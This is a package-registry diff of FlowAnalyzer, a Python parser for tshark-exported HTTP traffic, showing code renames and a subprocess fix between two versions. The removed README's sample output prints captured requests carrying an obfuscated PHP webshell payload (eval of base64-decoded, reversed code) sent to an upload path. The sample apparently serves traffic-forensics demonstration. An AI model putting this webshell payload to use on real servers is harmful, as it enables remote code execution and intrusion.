FlowAnalyzer 0.3.6__tar.gz → 0.3.8__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (16) hide show
  1. {flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/FlowAnalyzer/FlowAnalyzer.py +57 -51
  2. FlowAnalyzer-0.3.8/FlowAnalyzer.egg-info/PKG-INFO +71 -0
  3. FlowAnalyzer-0.3.8/PKG-INFO +71 -0
  4. FlowAnalyzer-0.3.8/README.md +53 -0
  5. {flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/setup.py +1 -1
  6. flowanalyzer-0.3.6/FlowAnalyzer.egg-info/PKG-INFO +0 -94
  7. flowanalyzer-0.3.6/PKG-INFO +0 -94
  8. flowanalyzer-0.3.6/README.md +0 -76
  9. {flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/FlowAnalyzer/Path.py +0 -0
  10. {flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/FlowAnalyzer/__init__.py +0 -0
  11. {flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/FlowAnalyzer/logging_config.py +0 -0
  12. {flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/FlowAnalyzer.egg-info/SOURCES.txt +0 -0
  13. {flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/FlowAnalyzer.egg-info/dependency_links.txt +0 -0
  14. {flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/FlowAnalyzer.egg-info/top_level.txt +0 -0
  15. {flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/LICENSE +0 -0
  16. {flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/setup.cfg +0 -0
{flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/FlowAnalyzer/FlowAnalyzer.py RENAMED
@@ -36,15 +36,15 @@ class HttpPair(NamedTuple):
36
36
  class FlowAnalyzer:
37
37
  """FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件"""
38
38
 
39
- def __init__(self, jsonPath: str):
39
+ def __init__(self, json_path: str):
40
40
  """初始化FlowAnalyzer对象
41
41
 
42
42
  Parameters
43
43
  ----------
44
- jsonPath : str
44
+ json_path : str
45
45
  tshark导出的JSON文件路径
46
46
  """
47
- self.jsonPath = jsonPath
47
+ self.json_path = json_path
48
48
  self.check_json_file()
49
49
 
50
50
  def check_json_file(self):
@@ -58,11 +58,11 @@ class FlowAnalyzer:
58
58
  ValueError
59
59
  当JSON文件内容为空时抛出异常
60
60
  """
61
- if not os.path.exists(self.jsonPath):
62
- raise FileNotFoundError("您的tshark导出的JSON文件没有找到!JSON路径:%s" % self.jsonPath)
61
+ if not os.path.exists(self.json_path):
62
+ raise FileNotFoundError("您的tshark导出的JSON文件没有找到!JSON路径:%s" % self.json_path)
63
63
 
64
- if os.path.getsize(self.jsonPath) == 0:
65
- raise ValueError("您的tshark导出的JSON文件内容为空!JSON路径:%s" % self.jsonPath)
64
+ if os.path.getsize(self.json_path) == 0:
65
+ raise ValueError("您的tshark导出的JSON文件内容为空!JSON路径:%s" % self.json_path)
66
66
 
67
67
  def parse_packet(self, packet: dict) -> Tuple[int, int, float, str, str]:
68
68
  """解析Json中的关键信息字段
@@ -92,7 +92,6 @@ class FlowAnalyzer:
92
92
  return frame_num, request_in, time_epoch, full_uri, full_request
93
93
 
94
94
  def parse_http_json(self) -> Tuple[Dict[int, Request], Dict[int, Response]]:
95
- # sourcery skip: use-named-expression
96
95
  """解析JSON数据文件中的HTTP请求和响应信息
97
96
 
98
97
  Returns
@@ -100,7 +99,7 @@ class FlowAnalyzer:
100
99
  tuple
101
100
  包含请求字典和响应列表的元组
102
101
  """
103
- with open(self.jsonPath, "r", encoding="utf-8") as f:
102
+ with open(self.json_path, "r", encoding="utf-8") as f:
104
103
  data = json.load(f)
105
104
 
106
105
  requests, responses = {}, {}
@@ -110,7 +109,7 @@ class FlowAnalyzer:
110
109
  header, file_data = self.extract_http_file_data(full_request)
111
110
 
112
111
  # 请求包使用 full_uri 来记录请求 url 返回包使用 request_in 来记录请求包的序号
113
- if packet.get("http.response_number"):
112
+ if packet.get("http.response.code"):
114
113
  responses[frame_num] = Response(
115
114
  frame_num=frame_num,
116
115
  request_in=request_in,
@@ -149,20 +148,18 @@ class FlowAnalyzer:
149
148
  yield HttpPair(request=None, response=resp)
150
149
 
151
150
  @staticmethod
152
- def get_hash(filePath: str, display_filter: str) -> str:
153
- with open(filePath, "rb") as f:
151
+ def get_hash(file_path: str, display_filter: str) -> str:
152
+ with open(file_path, "rb") as f:
154
153
  return hashlib.md5(f.read() + display_filter.encode()).hexdigest()
155
154
 
156
155
  @staticmethod
157
- def extract_json_file(fileName: str, display_filter: str, tshark_workDir: str, tshark_path: str) -> None:
158
- # sourcery skip: replace-interpolation-with-fstring, use-fstring-for-formatting
156
+ def extract_json_file(file_name: str, display_filter: str, tshark_work_dir: str, tshark_path: str) -> None:
159
157
  command = [
160
158
  tshark_path,
161
- "-r", fileName,
162
- "-Y", f"(tcp.reassembled_in) or ({display_filter})",
159
+ "-r", file_name,
160
+ "-Y", f"({display_filter})",
163
161
  "-T", "json",
164
- "-e", "http.request_number",
165
- "-e", "http.response_number",
162
+ "-e", "http.response.code",
166
163
  "-e", "http.request_in",
167
164
  "-e", "tcp.reassembled.data",
168
165
  "-e", "frame.number",
@@ -170,33 +167,43 @@ class FlowAnalyzer:
170
167
  "-e", "frame.time_epoch",
171
168
  "-e", "exported_pdu.exported_pdu",
172
169
  "-e", "http.request.full_uri",
173
- ">", "output.json",
174
170
  ]
175
171
 
176
- _, stderr = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=tshark_workDir).communicate()
177
- if stderr != b"" and b"WARNING" not in stderr:
178
- print(f"[Waring/Error]: {stderr}")
172
+ with open(f"{tshark_work_dir}/output.json", "wb") as output_file:
173
+ process = subprocess.Popen(
174
+ command,
175
+ stdout=output_file,
176
+ stderr=subprocess.PIPE,
177
+ cwd=tshark_work_dir
178
+ )
179
+ _, stderr = process.communicate()
180
+
181
+ if stderr and b"WARNING" not in stderr:
182
+ try:
183
+ print(f"[Warning/Error]: {stderr.decode('utf-8')}")
184
+ except Exception:
185
+ print(f"[Warning/Error]: {stderr.decode('gbk')}")
179
186
 
180
187
  @staticmethod
181
- def move_and_addMD5Sum(tshark_jsonPath: str, jsonWordPath: str, MD5Sum: str) -> None:
182
- if tshark_jsonPath != jsonWordPath:
183
- shutil.move(tshark_jsonPath, jsonWordPath)
188
+ def move_and_add_md5sum(tshark_json_path: str, json_work_path: str, md5_sum: str) -> None:
189
+ if tshark_json_path != json_work_path:
190
+ shutil.move(tshark_json_path, json_work_path)
184
191
 
185
- with open(jsonWordPath, "r", encoding="utf-8") as f:
192
+ with open(json_work_path, "r", encoding="utf-8") as f:
186
193
  data = json.load(f)
187
- data[0]["MD5Sum"] = MD5Sum
194
+ data[0]["MD5Sum"] = md5_sum
188
195
 
189
- with open(jsonWordPath, "w", encoding="utf-8") as f:
196
+ with open(json_work_path, "w", encoding="utf-8") as f:
190
197
  json.dump(data, f, indent=2)
191
198
 
192
199
  @staticmethod
193
- def get_json_data(filePath: str, display_filter: str, tshark_path: Optional[str] = None) -> str:
200
+ def get_json_data(file_path: str, display_filter: str, tshark_path: Optional[str] = None) -> str:
194
201
  # sourcery skip: replace-interpolation-with-fstring
195
202
  """获取JSON数据并保存至文件,保存目录是当前工作目录,也就是您运行脚本所在目录
196
203
 
197
204
  Parameters
198
205
  ----------
199
- filePath : str
206
+ file_path : str
200
207
  待处理的数据文件路径
201
208
  display_filter : str
202
209
  WireShark的显示过滤器
@@ -206,30 +213,30 @@ class FlowAnalyzer:
206
213
  str
207
214
  保存JSON数据的文件路径
208
215
  """
209
- if not os.path.exists(filePath):
210
- raise FileNotFoundError("您的填写的流量包没有找到!流量包路径:%s" % filePath)
216
+ if not os.path.exists(file_path):
217
+ raise FileNotFoundError("您的填写的流量包没有找到!流量包路径:%s" % file_path)
211
218
 
212
- MD5Sum = FlowAnalyzer.get_hash(filePath, display_filter)
213
- workDir = os.getcwd()
214
- tshark_workDir = os.path.dirname(os.path.abspath(filePath))
215
- tshark_jsonPath = os.path.join(tshark_workDir, "output.json")
216
- jsonWordPath = os.path.join(workDir, "output.json")
217
- fileName = os.path.basename(filePath)
219
+ md5_sum = FlowAnalyzer.get_hash(file_path, display_filter)
220
+ work_dir = os.getcwd()
221
+ tshark_work_dir = os.path.dirname(os.path.abspath(file_path))
222
+ tshark_json_path = os.path.join(tshark_work_dir, "output.json")
223
+ json_work_path = os.path.join(work_dir, "output.json")
224
+ file_name = os.path.basename(file_path)
218
225
 
219
- if os.path.exists(jsonWordPath):
226
+ if os.path.exists(json_work_path):
220
227
  try:
221
- with open(jsonWordPath, "r", encoding="utf-8") as f:
228
+ with open(json_work_path, "r", encoding="utf-8") as f:
222
229
  data = json.load(f)
223
- if data[0].get("MD5Sum") == MD5Sum:
230
+ if data[0].get("MD5Sum") == md5_sum:
224
231
  logger.debug("匹配HASH校验无误,自动返回Json文件路径!")
225
- return jsonWordPath
232
+ return json_work_path
226
233
  except Exception:
227
- logger.debug("默认的Json文件无法被正常解析, 正在重新生成josn文件中")
234
+ logger.debug("默认的Json文件无法被正常解析, 正在重新生成Json文件中")
228
235
 
229
236
  tshark_path = FlowAnalyzer.get_tshark_path(tshark_path)
230
- FlowAnalyzer.extract_json_file(fileName, display_filter, tshark_workDir, tshark_path)
231
- FlowAnalyzer.move_and_addMD5Sum(tshark_jsonPath, jsonWordPath, MD5Sum)
232
- return jsonWordPath
237
+ FlowAnalyzer.extract_json_file(file_name, display_filter, tshark_work_dir, tshark_path)
238
+ FlowAnalyzer.move_and_add_md5sum(tshark_json_path, json_work_path, md5_sum)
239
+ return json_work_path
233
240
 
234
241
  @staticmethod
235
242
  def get_tshark_path(tshark_path: Optional[str]) -> str:
@@ -254,8 +261,7 @@ class FlowAnalyzer:
254
261
  exit(-1)
255
262
  return use_tshark_path
256
263
 
257
- def Split_HTTP_headers(self, file_data: bytes) -> Tuple[bytes, bytes]:
258
- # sourcery skip: use-named-expression
264
+ def split_http_headers(self, file_data: bytes) -> Tuple[bytes, bytes]:
259
265
  headerEnd = file_data.find(b"\r\n\r\n")
260
266
  if headerEnd != -1:
261
267
  headerEnd += 4
@@ -267,7 +273,7 @@ class FlowAnalyzer:
267
273
  print("[Warning] 没有找到headers和response的划分位置!")
268
274
  return b"", file_data
269
275
 
270
- def Dechunck_HTTP_response(self, file_data: bytes) -> bytes:
276
+ def dechunck_http_response(self, file_data: bytes) -> bytes:
271
277
  """解码分块TCP数据
272
278
 
273
279
  Parameters
@@ -307,10 +313,10 @@ class FlowAnalyzer:
307
313
  tuple
308
314
  包含header和file_data的元组
309
315
  """
310
- header, file_data = self.Split_HTTP_headers(bytes.fromhex(full_request))
316
+ header, file_data = self.split_http_headers(bytes.fromhex(full_request))
311
317
 
312
318
  with contextlib.suppress(Exception):
313
- file_data = self.Dechunck_HTTP_response(file_data)
319
+ file_data = self.dechunck_http_response(file_data)
314
320
 
315
321
  with contextlib.suppress(Exception):
316
322
  if file_data.startswith(b"\x1F\x8B"):
FlowAnalyzer-0.3.8/FlowAnalyzer.egg-info/PKG-INFO ADDED
@@ -0,0 +1,71 @@
1
+ Metadata-Version: 2.1
2
+ Name: FlowAnalyzer
3
+ Version: 0.3.8
4
+ Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
5
+ Home-page: https://github.com/Byxs20/FlowAnalyzer
6
+ Author: Byxs20
7
+ Author-email: 97766819@qq.com
8
+ Classifier: Development Status :: 3 - Alpha
9
+ Classifier: Intended Audience :: Developers
10
+ Classifier: License :: OSI Approved :: MIT License
11
+ Classifier: Programming Language :: Python :: 3
12
+ Classifier: Programming Language :: Python :: 3.6
13
+ Classifier: Programming Language :: Python :: 3.7
14
+ Classifier: Programming Language :: Python :: 3.8
15
+ Classifier: Programming Language :: Python :: 3.9
16
+ Description-Content-Type: text/markdown
17
+ License-File: LICENSE
18
+
19
+ # FlowAnalyzer
20
+
21
+ # 安装
22
+
23
+ 使用 `pip` 安装:
24
+
25
+ ```
26
+ pip3 install FlowAnalyzer
27
+ ```
28
+
29
+ ```
30
+ pip3 install FlowAnalyzer -i https://pypi.org/simple
31
+ ```
32
+
33
+ # 快速上手
34
+
35
+ ## 配置
36
+
37
+ 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
38
+
39
+ ```python
40
+ # windows
41
+ tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
42
+ ```
43
+
44
+ `Linux`, `MacOS` 默认路径不清楚,需要看下面的**纠正路径**,**确定路径没有问题,那也无需任何配置即可使用!**
45
+
46
+ ## 纠正路径
47
+
48
+ 修改 `python安装目录\Lib\site-packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为**tshark正确路径**
49
+
50
+ ## 测试
51
+
52
+ ```
53
+ $ git clone https://github.com/Byxs20/FlowAnalyzer.git
54
+ $ cd ./FlowAnalyzer/
55
+ $ python -m tests.demo
56
+ ```
57
+
58
+ 运行结果:
59
+
60
+ ```
61
+ [+] 正在处理第1个HTTP流!
62
+ 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\n
63
+ ...
64
+ ```
65
+
66
+ # Contributing
67
+ Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
68
+
69
+ # License
70
+
71
+ This project is licensed under the [MIT License.](LICENSE)
FlowAnalyzer-0.3.8/PKG-INFO ADDED
@@ -0,0 +1,71 @@
1
+ Metadata-Version: 2.1
2
+ Name: FlowAnalyzer
3
+ Version: 0.3.8
4
+ Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
5
+ Home-page: https://github.com/Byxs20/FlowAnalyzer
6
+ Author: Byxs20
7
+ Author-email: 97766819@qq.com
8
+ Classifier: Development Status :: 3 - Alpha
9
+ Classifier: Intended Audience :: Developers
10
+ Classifier: License :: OSI Approved :: MIT License
11
+ Classifier: Programming Language :: Python :: 3
12
+ Classifier: Programming Language :: Python :: 3.6
13
+ Classifier: Programming Language :: Python :: 3.7
14
+ Classifier: Programming Language :: Python :: 3.8
15
+ Classifier: Programming Language :: Python :: 3.9
16
+ Description-Content-Type: text/markdown
17
+ License-File: LICENSE
18
+
19
+ # FlowAnalyzer
20
+
21
+ # 安装
22
+
23
+ 使用 `pip` 安装:
24
+
25
+ ```
26
+ pip3 install FlowAnalyzer
27
+ ```
28
+
29
+ ```
30
+ pip3 install FlowAnalyzer -i https://pypi.org/simple
31
+ ```
32
+
33
+ # 快速上手
34
+
35
+ ## 配置
36
+
37
+ 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
38
+
39
+ ```python
40
+ # windows
41
+ tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
42
+ ```
43
+
44
+ `Linux`, `MacOS` 默认路径不清楚,需要看下面的**纠正路径**,**确定路径没有问题,那也无需任何配置即可使用!**
45
+
46
+ ## 纠正路径
47
+
48
+ 修改 `python安装目录\Lib\site-packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为**tshark正确路径**
49
+
50
+ ## 测试
51
+
52
+ ```
53
+ $ git clone https://github.com/Byxs20/FlowAnalyzer.git
54
+ $ cd ./FlowAnalyzer/
55
+ $ python -m tests.demo
56
+ ```
57
+
58
+ 运行结果:
59
+
60
+ ```
61
+ [+] 正在处理第1个HTTP流!
62
+ 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\n
63
+ ...
64
+ ```
65
+
66
+ # Contributing
67
+ Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
68
+
69
+ # License
70
+
71
+ This project is licensed under the [MIT License.](LICENSE)
FlowAnalyzer-0.3.8/README.md ADDED
@@ -0,0 +1,53 @@
1
+ # FlowAnalyzer
2
+
3
+ # 安装
4
+
5
+ 使用 `pip` 安装:
6
+
7
+ ```
8
+ pip3 install FlowAnalyzer
9
+ ```
10
+
11
+ ```
12
+ pip3 install FlowAnalyzer -i https://pypi.org/simple
13
+ ```
14
+
15
+ # 快速上手
16
+
17
+ ## 配置
18
+
19
+ 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
20
+
21
+ ```python
22
+ # windows
23
+ tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
24
+ ```
25
+
26
+ `Linux`, `MacOS` 默认路径不清楚,需要看下面的**纠正路径**,**确定路径没有问题,那也无需任何配置即可使用!**
27
+
28
+ ## 纠正路径
29
+
30
+ 修改 `python安装目录\Lib\site-packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为**tshark正确路径**
31
+
32
+ ## 测试
33
+
34
+ ```
35
+ $ git clone https://github.com/Byxs20/FlowAnalyzer.git
36
+ $ cd ./FlowAnalyzer/
37
+ $ python -m tests.demo
38
+ ```
39
+
40
+ 运行结果:
41
+
42
+ ```
43
+ [+] 正在处理第1个HTTP流!
44
+ 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\n
45
+ ...
46
+ ```
47
+
48
+ # Contributing
49
+ Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
50
+
51
+ # License
52
+
53
+ This project is licensed under the [MIT License.](LICENSE)
{flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/setup.py RENAMED
@@ -7,7 +7,7 @@ with open(os.path.join(os.path.dirname(__file__), "README.md"), encoding="utf-8"
7
7
 
8
8
  setup(
9
9
  name="FlowAnalyzer",
10
- version="0.3.6",
10
+ version="0.3.8",
11
11
  description="FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件",
12
12
  author="Byxs20",
13
13
  author_email="97766819@qq.com",
flowanalyzer-0.3.6/FlowAnalyzer.egg-info/PKG-INFO DELETED
@@ -1,94 +0,0 @@
1
- Metadata-Version: 2.1
2
- Name: FlowAnalyzer
3
- Version: 0.3.6
4
- Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
5
- Home-page: https://github.com/Byxs20/FlowAnalyzer
6
- Author: Byxs20
7
- Author-email: 97766819@qq.com
8
- Classifier: Development Status :: 3 - Alpha
9
- Classifier: Intended Audience :: Developers
10
- Classifier: License :: OSI Approved :: MIT License
11
- Classifier: Programming Language :: Python :: 3
12
- Classifier: Programming Language :: Python :: 3.6
13
- Classifier: Programming Language :: Python :: 3.7
14
- Classifier: Programming Language :: Python :: 3.8
15
- Classifier: Programming Language :: Python :: 3.9
16
- Description-Content-Type: text/markdown
17
- License-File: LICENSE
18
-
19
- # FlowAnalyzer
20
-
21
- # 安装
22
-
23
- 使用 `pip` 安装:
24
-
25
- ```
26
- pip3 install FlowAnalyzer
27
- ```
28
-
29
- ```
30
- pip3 install FlowAnalyzer -i https://pypi.org/simple
31
- ```
32
-
33
- # 快速上手
34
-
35
- 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
36
-
37
- ```python
38
- # windows
39
- tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
40
- ```
41
-
42
- 您确定路径没有问题,那也无需任何配置即可使用!
43
-
44
- 否则,您需要修改 `python安装目录\Lib\site- packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为您的安装目录
45
-
46
- ```
47
- $ git clone https://github.com/Byxs20/FlowAnalyzer.git
48
- $ cd ./FlowAnalyzer/
49
- ```
50
-
51
- 使用 `python3 .\tests\demo.py` 看是否能输出正确的运行结果,测试代码如下:
52
-
53
- ```python
54
- # sourcery skip: use-fstring-for-formatting
55
- import os
56
- from FlowAnalyzer import FlowAnalyzer
57
-
58
-
59
- baseDir = os.path.dirname(os.path.abspath(__file__))
60
- flowPath = os.path.join(baseDir, "flow.pcapng")
61
- display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
62
-
63
- jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
64
- for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
65
- print(f"[+] 正在处理第{count}个HTTP流!")
66
-
67
- request, response = http.request, http.response
68
- if request:
69
- request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
70
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
71
-
72
- if response:
73
- response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
74
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
75
- ```
76
-
77
- 运行结果:
78
-
79
- ```
80
- [+] 正在处理第1个HTTP流!
81
- 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
82
- 序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
83
- [+] 正在处理第2个HTTP流!
84
- 序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
85
- 序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
86
- ...
87
- ```
88
-
89
- # Contributing
90
- Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
91
-
92
- # License
93
-
94
- This project is licensed under the [MIT License.](LICENSE)
flowanalyzer-0.3.6/PKG-INFO DELETED
@@ -1,94 +0,0 @@
1
- Metadata-Version: 2.1
2
- Name: FlowAnalyzer
3
- Version: 0.3.6
4
